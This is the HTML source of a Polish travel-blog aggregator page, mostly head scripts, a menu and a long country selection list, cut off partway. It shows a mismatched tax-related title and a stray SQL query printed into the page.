<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl" lang="pl"><head>
<title>Program PIT 2016 - skorzystaj z pomocy przy wypełnianiu rocznej deklaracji podatkowej.</title>
<meta name="keywords" content="wycieczki , blog podróżniczy, mapa podróży">
<meta name="description" content="Zbieramy opisy wycieczek z polskich blogów i tworzymy mapę podróży polskich blogerów. Zobacz naszych podróżników i czytaj ich pasjonujące relacje z podróży do nawet najdalszych zakątków świata.">
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta http-equiv="reply-to" content="info@crazybeaver.net">
<meta name="language" content="pl">
<meta name="author" content="crazybeaver.net - strony internetowe, tel. 91 455 31 67">

<link rel="stylesheet" type="text/css" href="/css/normal.css" title="normal">
<link type="text/css" rel="stylesheet" href="/css/jquery.ui.datepicker.css">
<link type="text/css" rel="stylesheet" href="/css/jquery.ui.theme.css">
<link href="/css/jquery.selectbox.css" type="text/css" rel="stylesheet">
<link rel="shortcut icon" href="/images/favicon.png">
<script src="https://pagead2.googlesyndication.com/pagead/js/r20181031/r20180604/osd.js"></script><script src="https://pagead2.googlesyndication.com/pub-config/r20160913/ca-pub-6578848901865058.js"></script><script async="" src="//www.google-analytics.com/analytics.js"></script><script src="/js/jquery.min.js"></script>
<script src="/js/jquery.corner.js"></script>

<script type="text/javascript" src="/js/jquery.selectbox.js"></script>
		<script type="text/javascript">
		$(function () {
			$("#country").selectbox();
		});
		</script>


<script src="http://malsup.github.com/jquery.cycle2.js"></script>
<link href="http://fonts.googleapis.com/css?family=Mouse+Memoirs&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css">
<link href="http://fonts.googleapis.com/css?family=Lobster&amp;subset=latin,latin-ext" rel="stylesheet" type="text/css">
<script type="text/javascript" src="/js/jquery.tinytips.js"></script>
<script type="text/javascript" src="/js/cookie.js"></script>

<script>
  (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
  (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
  m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
  })(window,document,'script','//www.google-analytics.com/analytics.js','ga');

  ga('create', 'UA-41750621-1', 'travelreporter.pl');
  ga('send', 'pageview');

</script>

<link rel="preload" href="https://adservice.google.com/adsid/integrator.js?domain=travelreporter.pl"><script type="text/javascript" src="https://adservice.google.com/adsid/integrator.js?domain=travelreporter.pl"></script><link rel="preload" href="http://pagead2.googlesyndication.com/pagead/js/r20181031/r20180604/show_ads_impl.js"></head>
<body>
<script>
	$(document).ready(function() { $('.tip').tinyTips('title');  $('#trips .item').cycle(); });
</script>
<div id="container">

<div id="top">
	<div id="logo">
		<!--&laquo; <a href="/">do strony głównej</a><br /><br />-->
		<a href="/" id="logolink"><img src="/images/logow.png" alt="agregator blogów podróżniczych"></a>
	</div>
	<div id="menu">
		<ul>
			<li class="m"><a href="/mapa">mapa</a></li>
			<li class="m"><a href="/podroznicy">podróżnicy</a></li>
			<li class="m"><a href="/o-portalu">o portalu</a></li>
			<li class="m"><a href="/kontakt">kontakt</a></li>
			<li class="m"><a href="/dodaj">dodaj bloga</a></li>
			<li>
			<form action="/country.php" method="get"><input type="hidden" name="action" value="kraj"><select onchange="this.form.submit()" name="tid" id="country" sb="21413232" style="display: none;">
<option value="">-- wybierz kraj --</option>
SELECT country FROM tr_posts WHERE country!='' AND accepted='1' AND hidden!='1' GROUP BY(country);<option value="02000">02000</option><option value="39040">39040</option><option value="53100">53100</option><option value="56000">56000</option><option value="Abchazja">Abchazja</option><option value="Afganistan">Afganistan</option><option value="Afryka">Afryka</option><option value="Albania">Albania</option><option value="Alpy">Alpy</option><option value="Ameryka Południowa">Ameryka Południowa</option><option value="Andaluzja">Andaluzja</option><option value="Andora">Andora</option><option value="Anglia">Anglia</option><option value="Angola">Angola</option><option value="Angolia">Angolia</option><option value="Arabia Saudyjska">Arabia Saudyjska</option><option value="Argentyna">Argentyna</option><option value="Arktyka">Arktyka</option><option value="Armenia">Armenia</option><option value="Australia">Australia</option><option value="Austria">Austria</option><option value="Autonomia Palestyńska">Autonomia Palestyńska</option><option value="Azerbejdżan">Azerbejdżan</option><option value="Azja">Azja</option><option value="Bahamy">Bahamy</option><option value="Bahrajn">Bahrajn</option><option value="Bałkany">Bałkany</option><option value="Bangladesz">Bangladesz</option><option value="Barbados">Barbados</option><option value="Belgia">Belgia</option><option value="Belize">Belize</option><option value="Betlejem">Betlejem</option><option value="Białoruś">Białoruś</option><option value="Birma">Birma</option><option value="Bizancjum">Bizancjum</option><option value="Boliwia">Boliwia</option><option value="Borneo">Borneo</option><option value="Bośnia i Hercegowina">Bośnia i Hercegowina</option><option value="Botswana">Botswana</option><option value="Brazylia">Brazylia</option><option value="Broad Peak">Broad Peak</option><option value="Brunei">Brunei</option><option value="Bułgaria">Bułgaria</option><option value="Burkina Faso">Burkina Faso</option><option value="Cambodia">Cambodia</option><option value="Chile">Chile</option><option value="Chiny">Chiny</option><option value="Chorwacja">Chorwacja</option><option value="Chorwcja">Chorwcja</option><option value="Cypr">Cypr</option><option value="Czarnogóra">Czarnogóra</option><option value="Czechy">Czechy</option><option value="Dalmacja">Dalmacja</option><option value="Dania">Dania</option><option value="Desan">Desan</option><option value="Dominikana">Dominikana</option><option value="Dżammu i Kaszmir">Dżammu i Kaszmir</option><option value="Egipt">Egipt</option><option value="Ekwador">Ekwador</option><option value="England">England</option><option value="Estonia">Estonia</option><option value="Etiopia">Etiopia</option><option value="Famagusta">Famagusta</option><option value="Filipiny">Filipiny</option><option value="Finlandia">Finlandia</option><option value="Francja">Francja</option><option value="Gabon">Gabon</option><option value="Gambia">Gambia</option><option value="Germany">Germany</option><option value="Ghana">Ghana</option><option value="Gibraltar">Gibraltar</option><option value="Girne">Girne</option><option value="Grecja">Grecja</option><option value="Grenada">Grenada</option><option value="Grenlandia">Grenlandia</option><option value="Gruzja">Gruzja</option><option value="Gujana">Gujana</option><option value="Gwatemala">Gwatemala</option><option value="Gwinea Równikowa">Gwinea Równikowa</option><option value="Ha Long Bay">Ha Long Bay</option><option value="Hebron">Hebron</option><option value="Hercegowina">Hercegowina</option><option value="Hiszpania">Hiszpania</option><option value="Holandia">Holandia</option><option value="Honduras">Honduras</option><option value="Hong Kong">Hong Kong</option><option value="Hongkong">Hongkong</option><option value="Iberia">Iberia</option><option value="Iceland">Iceland</option><option value="Indie">Indie</option><option value="Indonezja">Indonezja</option><option value="Irak">Irak</option><option value="Iran">Iran</option><option value="Irlandia">Irlandia</option><option value="Irlandia Północna">Irlandia Północna</option><option value="Irlaniadia">Irlaniadia</option><option value="Islandia">Islandia</option><option value="Izrael">Izrael</option><option value="Jamajka">Jamajka</option><option value="Japonia">Japonia</option><option value="Jemen">Jemen</option><option value="Jezioro Bodeńskie">Jezioro Bodeńskie</option><option value="Jezioro Szkoderskie">Jezioro Szkoderskie</option><option value="Jordania">Jordania</option><option value="Kajmany">Kajmany</option><option value="Kambodża">Kambodża</option><option value="Kamerun">Kamerun</option><option value="Kanada">Kanada</option><option value="Kapadocja">Kapadocja</option><option value="Karaiby">Karaiby</option><option value="Kasprowy Wierch">Kasprowy Wierch</option><option value="Katar">Katar</option><option value="Kaukaz">Kaukaz</option><option value="Kazachstan">Kazachstan</option><option value="Kendal">Kendal</option><option value="Kenia">Kenia</option><option value="Kirgistan">Kirgistan</option><option value="Kolumbia">Kolumbia</option><option value="Komuna e Ferizajt">Komuna e Ferizajt</option><option value="Kongo">Kongo</option><option value="Korea">Korea</option><option value="Korea Południowa">Korea Południowa</option><option value="Korea Północna">Korea Północna</option><option value="Kos">Kos</option><option value="Kosowo">Kosowo</option><option value="Kostaryka">Kostaryka</option><option value="Kuba">Kuba</option><option value="Kurdystan">Kurdystan</option><option value="Kuwejt">Kuwejt</option><option value="Laos">Laos</option><option value="Laponia">Laponia</option><option value="Liban">Liban</option><option value="Libia">Libia</option><option value="Lichtenstein">Lichtenstein</option><option value="Liechtenstein">Liechtenstein</option><option value="Litwa">Litwa</option><option value="Lotwa">Lotwa</option><option value="Luksemburg">Luksemburg</option><option value="Luxemburg">Luxemburg</option><option value="Łotwa">Łotwa</option><option value="Macau">Macau</option><option value="Macedonia">Macedonia</option><option value="Macedonia (BJRM)">Macedonia (BJRM)</option><option value="Madagaskar">Madagaskar</option><option value="Madera">Madera</option><option value="Majorka">Majorka</option><option value="Makau">Makau</option><option value="Malediwy">Malediwy</option><option value="Malezja">Malezja</option><option value="Mali">Mali</option><option value="Malta">Malta</option><option value="Maroko">Maroko</option><option value="Mauretania">Mauretania</option><option value="Mauritius">Mauritius</option><option value="Mediolan">Mediolan</option><option value="Mekong">Mekong</option><option value="Meksyk">Meksyk</option><option value="Mołdawia">Mołdawia</option><option value="Monako">Monako</option><option value="Mongolia">Mongolia</option><option value="Morze Jońskie">Morze Jońskie</option><option value="Morze Martwe">Morze Martwe</option><option value="Mozambik">Mozambik</option><option value="Municipality of Mitrovica">Municipality of Mitrovica</option><option value="Myanmar (Birma)">Myanmar (Birma)</option><option value="Namibia">Namibia</option><option value="Nepal">Nepal</option><option value="Niemcy">Niemcy</option><option value="Nigeria">Nigeria</option><option value="Nikaragua">Nikaragua</option><option value="Norwegia">Norwegia</option><option value="Nowa Kaledonia">Nowa Kaledonia</option><option value="Nowa Zelandia">Nowa Zelandia</option><option value="Oman">Oman</option><option value="Pakistan">Pakistan</option><option value="Palestyna">Palestyna</option><option value="Panama">Panama</option><option value="Papua">Papua</option><option value="Papua-Nowa Gwinea">Papua-Nowa Gwinea</option><option value="Paraguay River">Paraguay River</option><option value="Paragwaj">Paragwaj</option><option value="Paryż">Paryż</option><option value="Patagonia">Patagonia</option><option value="Penguin Reef">Penguin Reef</option><option value="Peru">Peru</option><option value="Pilsko">Pilsko</option><option value="Pol">Pol</option><option value="Polinezja Francuska">Polinezja Francuska</option><option value="Polska">Polska</option><option value="Portugalia">Portugalia</option><option value="Prisztina">Prisztina</option><option value="Prizren">Prizren</option><option value="Republika Południowej Afryki">Republika Południowej Afryki</option><option value="Reunion">Reunion</option><option value="Rosja">Rosja</option><option value="Rumunia">Rumunia</option><option value="Rwanda">Rwanda</option><option value="Ryga">Ryga</option><option value="Sahara">Sahara</option><option value="Sahara Zachodnia">Sahara Zachodnia</option><option value="Salwador">Salwador</option><option value="Samoa">Samoa</option><option value="San Marino">San Marino</option><option value="Senegal">Senegal</option><option value="Serbia">Serbia</option><option value="Seszele">Seszele</option><option value="Sierra Leone">Sierra Leone</option><option value="Singapur">Singapur</option><option value="Słowacja">Słowacja</option><option value="Słowenia">Słowenia</option><option value="Socza">Socza</option><option value="Sri Lanka">Sri Lanka</option><option value="Sta">Sta</option><option value="Stany Zjednoczone">Stany Zjednoczone</option><option value="Svalbard">Svalbard</option><option value="Syberia">Syberia</option><option value="Sycylia">Sycylia</option><option value="Syria">Syria</option><option value="Szkocja">Szkocja</option><option value="Szwajcaria">Szwajcaria</option><option value="Szwecja">Szwecja</option><option value="Tadżykistan">Tadżykistan</option><option value="Taj;andia">Taj;andia</option><option value="Tajlandia">Tajlandia</option><option value="Tajwan">Tajwan</option><option value="Tanzania">Tanzania</option><option value="Tatry">Tatry</option><option value="Tibet">Tibet</option><option value="Tibilisi">Tibilisi</option><option value="Titicaca">Titicaca</option><option value="Tunezja">Tunezja</option><option value="Turcja">Turcja</option><option value="Turkmenistan">Turkmenistan</option><option value="Tybet">Tybet</option><option value="Uganda">Uganda</option><option value="Ukraina">Ukraina</option><option value="USA">USA</option><option value="Uzbekistan">Uzbekistan</option><option value="W">W</option><option value="Walia">Walia</option><option value="Walsall">Walsall</option><option value="Watykan">Watykan</option><option value="Wenezuela">Wenezuela</option><option value="Węgry">Węgry</option><option value="Wielka Brytania">Wielka Brytania</option><option value="Wielka Rafa Koralowa">Wielka Rafa Koralowa</option><option value="Wietnam">Wietnam</option><option value="Włochy">Włochy</option><option value="Włóchy">Włóchy</option><option value="Wołowiec">Wołowiec</option><option value="Wyspa Północna">Wyspa Północna</option><option value="Wyspy Cooka">Wyspy Cooka</option><option value="Wyspy Kanaryjskie">Wyspy Kanaryjskie</option><option value="Wyspy Owcze">Wyspy Owcze</option><option value="Wyspy Salomona">Wyspy Salomona</option><option value="Wyspy Świętego Tomasza i Książęca">Wyspy Świętego Tomasza i Książęca</option><option value="Wyspy Zielonego Przylądka">Wyspy Zielonego Przylądka</option><option value="Zambia">Zambia</option><option value="Zatoka Botnicka">Zatoka Botnicka</option><option value="Zatoka Kotorska">Zatoka Kotorska</option><option value="Zimbabwe">Zimbabwe</option><option value="Zjednoczone Emiraty Arabskie">Zjednoczone Emiraty Arabskie</option>
</select><div id="sbHolder_21413232" class="sbHolder" tabindex="0"><a id="sbToggle_21413232" href="#" class="sbToggle"></a><a id="sbSelector_21413232" href="#" class="sbSelector">-- wybierz kraj --</a><ul id="sbOptions_21413232" class="sbOptions" style="display: none;"><li><a href="#" rel="" class="sbFocus">-- wybierz kraj --</a></li><li><a href="#02000" rel="02000">02000</a></li><li><a href="#39040" rel="39040">39040</a></li><li><a href="#53100" rel="53100">53100</a></li><li><a href="#56000" rel="56000">56000</a></li><li><a href="#Abchazja" rel="Abchazja">Abchazja</a></li><li><a href="#Afganistan" rel="Afganistan">Afganistan</a></li><li><a href="#Afryka" rel="Afryka">Afryka</a></li><li><a href="#Albania" rel="Albania">Albania</a></li><li><a href="#Alpy" rel="Alpy">Alpy</a></li><li><a href="#Ameryka Południowa" rel="Ameryka Południowa">Ameryka Południowa</a></li><li><a href="#Andaluzja" rel="Andaluzja">Andaluzja</a></li><li><a href="#Andora" rel="Andora">Andora</a></li><li><a href="#Anglia" rel="Anglia">Anglia</a></li><li><a href="#Angola" rel="Angola">Angola</a></li><li><a href="#Angolia" rel="Angolia">Angolia</a></li><li><a href="#Arabia Saudyjska" rel="Arabia Saudyjska">Arabia Saudyjska</a></li><li><a href="#Argentyna" rel="Argentyna">Argentyna</a></li><li><a href="#Arktyka" rel="Arktyka">Arktyka</a></li><li><a href="#Armenia" rel="Armenia">Armenia</a></li><li><a href="#Australia" rel="Australia">Australia</a></li><li><a href="#Austria" rel="Austria">Austria</a></li><li><a href="#Autonomia Palestyńska" rel="Autonomia Palestyńska">Autonomia Palestyńska</a></li><li><a href="#Azerbejdżan" rel="Azerbejdżan">Azerbejdżan</a></li><li><a href="#Azja" rel="Azja">Azja</a></li><li><a href="#Bahamy" rel="Bahamy">Bahamy</a></li><li><a href="#Bahrajn" rel="Bahrajn">Bahrajn</a></li><li><a href="#Bałkany" rel="Bałkany">Bałkany</a></li><li><a href="#Bangladesz" rel="Bangladesz">Bangladesz</a></li><li><a href="#Barbados" rel="Barbados">Barbados</a></li><li><a href="#Belgia" rel="Belgia">Belgia</a></li><li><a href="#Belize" rel="Belize">Belize</a></li><li><a href="#Betlejem" rel="Betlejem">Betlejem</a></li><li><a href="#Białoruś" rel="Białoruś">Białoruś</a></li><li><a href="#Birma" rel="Birma">Birma</a></li><li><a href="#Bizancjum" rel="Bizancjum">Bizancjum</a></li><li><a href="#Boliwia" rel="Boliwia">Boliwia</a></li><li><a href="#Borneo" rel="Borneo">Borneo</a></li><li><a href="#Bośnia i Hercegowina" rel="Bośnia i Hercegowina">Bośnia i Hercegowina</a></li><li><a href="#Botswana" rel="Botswana">Botswana</a></li><li><a href="#Brazylia" rel="Brazylia">Brazylia</a></li><li><a href="#Broad Peak" rel="Broad Peak">Broad Peak</a></li><li><a href="#Brunei" rel="Brunei">Brunei</a></li><li><a href="#Bułgaria" rel="Bułgaria">Bułgaria</a></li><li><a href="#Burkina Faso" rel="Burkina Faso">Burkina Faso</a></li><li><a href="#Cambodia" rel="Cambodia">Cambodia</a></li><li><a href="#Chile" rel="Chile">Chile</a></li><li><a href="#Chiny" rel="Chiny">Chiny</a></li><li><a href="#Chorwacja" rel="Chorwacja">Chorwacja</a></li><li><a href="#Chorwcja" rel="Chorwcja">Chorwcja</a></li><li><a href="#Cypr" rel="Cypr">Cypr</a></li><li><a href="#Czarnogóra" rel="Czarnogóra">Czarnogóra</a></li><li><a href="#Czechy" rel="Czechy">Czechy</a></li><li><a href="#Dalmacja" rel="Dalmacja">Dalmacja</a></li><li><a href="#Dania" rel="Dania">Dania</a></li><li><a href="#Desan" rel="Desan">Desan</a></li><li><a href="#Dominikana" rel="Dominikana">Dominikana</a></li><li><a href="#Dżammu i Kaszmir" rel="Dżammu i Kaszmir">Dżammu i Kaszmir</a></li><li><a href="#Egipt" rel="Egipt">Egipt</a></li><li><a href="#Ekwador" rel="Ekwador">Ekwador</a></li><li><a href="#England" rel="England">England</a></li><li><a href="#Estonia" rel="Estonia">Estonia</a></li><li><a href="#Etiopia" rel="Etiopia">Etiopia</a></li><li><a href="#Famagusta" rel="Famagusta">Famagusta</a></li><li><a href="#Filipiny" rel="Filipiny">Filipiny</a></li><li><a href="#Finlandia" rel="Finlandia">Finlandia</a></li><li><a href="#Francja" rel="Francja">Francja</a></li><li><a href="#Gabon" rel="Gabon">Gabon</a></li><li><a href="#Gambia" rel="Gambia">Gambia</a></li><li><a href="#Germany" rel="Germany">Germany</a></li><li><a href="#Ghana" rel="Ghana">Ghana</a></li><li><a href="#Gibraltar" rel="Gibraltar">Gibraltar</a></li><li><a href="#Girne" rel="Girne">Girne</a></li><li><a href="#Grecja" rel="Grecja">Grecja</a></li><li><a href="#Grenada" rel="Grenada">Grenada</a></li><li><a href="#Grenlandia" rel="Grenlandia">Grenlandia</a></li><li><a href="#Gruzja" rel="Gruzja">Gruzja</a></li><li><a href="#Gujana" rel="Gujana">Gujana</a></li><li><a href="#Gwatemala" rel="Gwatemala">Gwatemala</a></li><li><a href="#Gwinea Równikowa" rel="Gwinea Równikowa">Gwinea Równikowa</a></li><li><a href="#Ha Long Bay" rel="Ha Long Bay">Ha Long Bay</a></li><li><a href="#Hebron" rel="Hebron">Hebron</a></li><li><a href="#Hercegowina" rel="Hercegowina">Hercegowina</a></li><li><a href="#Hiszpania" rel="Hiszpania">Hiszpania</a></li><li><a href="#Holandia" rel="Holandia">Holandia</a></li><li><a href="#Honduras" rel="Honduras">Honduras</a></li><li><a href="#Hong Kong" rel="Hong Kong">Hong Kong</a></li><li><a href="#Hongkong" rel="Hongkong">Hongkong</a></li><li><a href="#Iberia" rel="Iberia">Iberia</a></li><li><a href="#Iceland" rel="Iceland">Iceland</a></li><li><a href="#Indie" rel="Indie">Indie</a></li><li><a href="#Indonezja" rel="Indonezja">Indonezja</a></li><li><a href="#Irak" rel="Irak">Irak</a></li><li><a href="#Iran" rel="Iran">Iran</a></li><li><a href="#Irlandia" rel="Irlandia">Irlandia</a></li><li><a href="#Irlandia Północna" rel="Irlandia Północna">Irlandia Północna</a></li><li><a href="#Irlaniadia" rel="Irlaniadia">Irlaniadia</a></li><li><a href="#Islandia" rel="Islandia">Islandia</a></li><li><a href="#Izrael" rel="Izrael">Izrael</a></li><li><a href="#Jamajka" rel="Jamajka">Jamajka</a></li><li><a href="#Japonia" rel="Japonia">Japonia</a></li><li><a href="#Jemen" rel="Jemen">Jemen</a></li><li><a href="#Jezioro Bodeńskie" rel="Jezioro Bodeńskie">Jezioro Bodeńskie</a></li><li><a href="#Jezioro Szkoderskie" rel="Jezioro Szkoderskie">Jezioro Szkoderskie</a></li><li><a href="#Jordania" rel="Jordania">Jordania</a></li><li><a href="#Kajmany" rel="Kajmany">Kajmany</a></li><li><a href="#Kambodża" rel="Kambodża">Kambodża</a></li><li><a href="#Kamerun" rel="Kamerun">Kamerun</a></li><li><a href="#Kanada" rel="Kanada">Kanada</a></li><li><a href="#Kapadocja" rel="Kapadocja">Kapadocja</a></li><li><a href="#Karaiby" rel="Karaiby">Karaiby</a></li><li><a href="#Kasprowy Wierch" rel="Kasprowy Wierch">Kasprowy Wierch</a></li><li><a href="#Katar" rel="Katar">Katar</a></li><li><a href="#Kaukaz" rel="Kaukaz">Kaukaz</a></li><li><a href="#Kazachstan" rel="Kazachstan">Kazachstan</a></li><li><a href="#Kendal" rel="Kendal">Kendal</a></li><li><a href="#Kenia" rel="Kenia">Kenia</a></li><li><a href="#Kirgistan" rel="Kirgistan">Kirgistan</a></li><li><a href="#Kolumbia" rel="Kolumbia">Kolumbia</a></li><li><a href="#Komuna e Ferizajt" rel="Komuna e Ferizajt">Komuna e Ferizajt</a></li><li><a href="#Kongo" rel="Kongo">Kongo</a></li><li><a href="#Korea" rel="Korea">Korea</a></li><li><a href="#Korea Południowa" rel="Korea Południowa">Korea Południowa</a></li><li><a href="#Korea Północna" rel="Korea Północna">Korea Północna</a></li><li><a href="#Kos" rel="Kos">Kos</a></li><li><a href="#Kosowo" rel="Kosowo">Kosowo</a></li><li><a href="#Kostaryka" rel="Kostaryka">Kostaryka</a></li><li><a href="#Kuba" rel="Kuba">Kuba</a></li><li><a href="#Kurdystan" rel="Kurdystan">Kurdystan</a></li><li><a href="#Kuwejt" rel="Kuwejt">Kuwejt</a></li><li><a href="#Laos" rel="Laos">Laos</a></li><li><a href="#Laponia" rel="Laponia">Laponia</a></li><li><a href="#Liban" rel="Liban">Liban</a></li><li><a href="#Libia" rel="Libia">Libia</a></li><li><a href="#Lichtenstein" rel="Lichtenstein">Lichtenstein</a></li><li><a href="#Liechtenstein" rel="Liechtenstein">Liechtenstein</a></li><li><a href="#Litwa" rel="Litwa">Litwa</a></li><li><a href="#Lotwa" rel="Lotwa">Lotwa</a></li><li><a href="#Luksemburg" rel="Luksemburg">Luksemburg</a></li><li><a href="#Luxemburg" rel="Luxemburg">Luxemburg</a></li><li><a href="#Łotwa" rel="Łotwa">Łotwa</a></li><li><a href="#Macau" rel="Macau">Macau</a></li><li><a href="#Macedonia" rel="Macedonia">Macedonia</a></li><li><a href="#Macedonia (BJRM)" rel="Macedonia (BJRM)">Macedonia (BJRM)</a></li><li><a href="#Madagaskar" rel="Madagaskar">Madagaskar</a></li><li><a href="#Madera" rel="Madera">Madera</a></li><li><a href="#Majorka" rel="Majorka">Majorka</a></li><li><a href="#Makau" rel="Makau">Makau</a></li><li><a href="#Malediwy" rel="Malediwy">Malediwy</a></li><li><a href="#Malezja" rel="Malezja">Malezja</a></li><li><a href="#Mali" rel="Mali">Mali</a></li><li><a href="#Malta" rel="Malta">Malta</a></li><li><a href="#Maroko" rel="Maroko">Maroko</a></li><li><a href="#Mauretania" rel="Mauretania">Mauretania</a></li><li><a href="#Mauritius" rel="Mauritius">Mauritius</a></li><li><a href="#Mediolan" rel="Mediolan">Mediolan</a></li><li><a href="#Mekong" rel="Mekong">Mekong</a></li><li><a href="#Meksyk" rel="Meksyk">Meksyk</a></li><li><a href="#Mołdawia" rel="Mołdawia">Mołdawia</a></li><li><a href="#Monako" rel="Monako">Monako</a></li><li><a href="#Mongolia" rel="Mongolia">Mongolia</a></li><li><a href="#Morze Jońskie" rel="Morze Jońskie">Morze Jońskie</a></li><li><a href="#Morze Martwe" rel="Morze Martwe">Morze Martwe</a></li><li><a href="#Mozambik" rel="Mozambik">Mozambik</a></li><li><a href="#Municipality of Mitrovica" rel="Municipality of Mitrovica">Municipality of Mitrovica</a></li><li><a href="#Myanmar (Birma)" rel="Myanmar (Birma)">Myanmar (Birma)</a></li><li><a href="#Namibia" rel="Namibia">Namibia</a></li><li><a href="#Nepal" rel="Nepal">Nepal</a></li><li><a href="#Niemcy" rel="Niemcy">Niemcy</a></li><li><a href="#Nigeria" rel="Nigeria">Nigeria</a></li><li><a href="#Nikaragua" rel="Nikaragua">Nikaragua</a></li><li><a href="#Norwegia" rel="Norwegia">Norwegia</a></li><li><a href="#Nowa Kaledonia" rel="Nowa Kaledonia">Nowa Kaledonia</a></li><li><a href="#Nowa Zelandia" rel="Nowa Zelandia">Nowa Zelandia</a></li><li><a href="#Oman" rel="Oman">Oman</a></li><li><a href="#Pakistan" rel="Pakistan">Pakistan</a></li><li><a href="#Palestyna" rel="Palestyna">Palestyna</a></li><li><a href="#Panama" rel="Panama">Panama</a></li><li><a href="#Papua" rel="Papua">Papua</a></li><li><a href="#Papua-Nowa Gwinea" rel="Papua-Nowa Gwinea">Papua-Nowa Gwinea</a></li><li><a href="#Paraguay River" rel="Paraguay River">Paraguay River</a></li><li><a href="#Paragwaj" rel="Paragwaj">Paragwaj</a></li><li><a href="#Paryż" rel="Paryż">Paryż</a></li><li><a href="#Patagonia" rel="Patagonia">Patagonia</a></li><li><a href="#Penguin Reef" rel="Penguin Reef">Penguin Reef</a></li><li><a href="#Peru" rel="Peru">Peru</a></li><li><a href="#Pilsko" rel="Pilsko">Pilsko</a></li><li><a href="#Pol" rel="Pol">Pol</a></li><li><a href="#Polinezja Francuska" rel="Polinezja Francuska">Polinezja Francuska</a></li><li><a href="#Polska" rel="Polska">Polska</a></li><li><a href="#Portugalia" rel="Portugalia">Portugalia</a></li><li><a href="#Prisztina" rel="Prisztina">Prisztina</a></li><li><a href="#Prizren" rel="Prizren">Prizren</a></li><li><a href="#Republika Południowej Afryki" rel="Republika Południowej Afryki">Republika Południowej Afryki</a></li><li><a href="#Reunion" rel="Reunion">Reunion</a></li><li><a href="#Rosja" rel="Rosja">Rosja</a></li><li><a href="#Rumunia" rel="Rumunia">Rumunia</a></li><li><a href="#Rwanda" rel="Rwanda">Rwanda</a></li><li><a href="#Ryga" rel="Ryga">Ryga</a></li><li><a href="#Sahara" rel="Sahara">Sahara</a></li><li><a href="#Sahara Zachodnia" rel="Sahara Zachodnia">Sahara Zachodnia</a></li><li><a href="#Salwador" rel="Salwador">Salwador</a></li><li><a href="#Samoa" rel="Samoa">Samoa</a></li><li><a href="#San Marino" rel="San Marino">San Marino</a></li><li><a href="#Senegal" rel="Senegal">Senegal</a></li><li><a href="#Serbia" rel="Serbia">Serbia</a></li><li><a href="#Seszele" rel="Seszele">Seszele</a></li><li><a href="#Sierra Leone" rel="Sierra Leone">Sierra Leone</a></li><li><a href="#Singapur" rel="Singapur">Singapur</a></li><li><a href="#Słowacja" rel="Słowacja">Słowacja</a></li><li><a href="#Słowenia" rel="Słowenia">Słowenia</a></li><li><a href="#Socza" rel="Socza">Socza</a></li><li><a href="#Sri Lanka" rel="Sri Lanka">Sri Lanka</a></li><li><a href="#Sta" rel="Sta">Sta</a></li><li><a href="#Stany Zjednoczone" rel="Stany Zjednoczone">Stany Zjednoczone</a></li><li><a href="#Svalbard" rel="Svalbard">Svalbard</a></li><li><a href="#Syberia" rel="Syberia">Syberia</a></li><li><a href="#Sycylia" rel="Sycylia">Sycylia</a></li><li><a href="#Syria" rel="Syria">Syria</a></li><li><a href="#Szkocja" rel="Szkocja">Szkocja</a></li><li><a href="#Szwajcaria" rel="Szwajcaria">Szwajcaria</a></li><li><a href="#Szwecja" rel="Szwecja">Szwecja</a></li><li><a href="#Tadżykistan" rel="Tadżykistan">Tadżykistan</a></li><li><a href="#Taj;andia" rel="Taj;andia">Taj;andia</a></li><li><a href="#Tajlandia" rel="Tajlandia">Tajlandia</a></li><li><a href="#Tajwan" rel="Tajwan">Tajwan</a></li><li><a href="#Tanzania" rel="Tanzania">Tanzania</a></li><li><a href="#Tatry" rel="Tatry">Tatry</a></li><li><a href="#Tibet" rel="Tibet">Tibet</a></li><li><a href="#Tibilisi" rel="Tibilisi">Tibilisi</a></li><li><a href="#Titicaca" rel="Titicaca">Titicaca</a></li><li><a href="#Tunezja" rel="Tunezja">Tunezja</a></li><li><a href="#Turcja" rel="Turcja">Turcja</a></li><li><a href="#Turkmenistan" rel="Turkmenistan">Turkmenistan</a></li><li><a href="#Tybet" rel="Tybet">Tybet</a></li><li><a href="#Uganda" rel="Uganda">Uganda</a></li><li><a href="#Ukraina" rel="Ukraina">Ukraina</a></li><li><a href="#USA" rel="USA">USA</a></li><li><a href="#Uzbekistan" rel="Uzbekistan">Uzbekistan</a></li><li><a href="#W" rel="W">W</a></li><li><a href="#Walia" rel="Walia">Walia</a></li><li><a href="#Walsall" rel="Walsall">Walsall</a></li><li><a href="#Watykan" rel="Watykan">Watykan</a></li><li><a href="#Wenezuela" rel="Wenezuela">Wenezuela</a></li><li><a href="#Węgry" rel="Węgry">Węgry</a></li><li><a href="#Wielka Brytania" rel="Wielka Brytania">Wielka Brytania</a></li><li><a href="#Wielka Rafa Koralowa" rel="Wielka Rafa Koralowa">Wielka Rafa Koralowa</a></li><li><a href="#Wietnam" rel="Wietnam">Wietnam</a></li><li><a href="#Włochy" rel="Włochy">Włochy</a></li><li><a href="#Włóchy" rel="Włóchy">Włóchy</a></li><li><a href="#Wołowiec" rel="Wołowiec">Wołowiec</a></li><li><a href="#Wyspa Północna" rel="Wyspa Północna">Wyspa Północna</a></li><li><a href="#Wyspy Cooka" rel="Wyspy Cooka">Wyspy Cooka</a></li><li><a href="#Wyspy Kanaryjskie" rel="Wyspy Kanaryjskie">Wyspy Kanaryjskie</a></li><li><a href="#Wyspy Owcze" rel="Wyspy Owcze">Wyspy Owcze</a></li><li><a href="#Wyspy Salomona" rel="Wyspy Salomona">Wyspy Salomona</a></li><li><a href="#Wyspy Świętego Tomasza i Książęca" rel="Wyspy Świętego Tomasza i Książęca">Wyspy Świętego Tomasza i Książęca</a></li><li><a href="#Wyspy Zielonego Przylądka" rel="Wyspy Zielonego Przylądka">Wyspy Zielonego Przylądka</a></li><li><a href="#Zambia" rel="Zambia">Zambia</a></li><li><a href="#Zatoka Botnicka" rel="Zatoka Botnicka">Zatoka Botnicka</a></li><li><a href="#Zatoka Kotorska" rel="Zatoka Kotorska">Zatoka Kotorska</a></li><li><a href="#Zimbabwe" 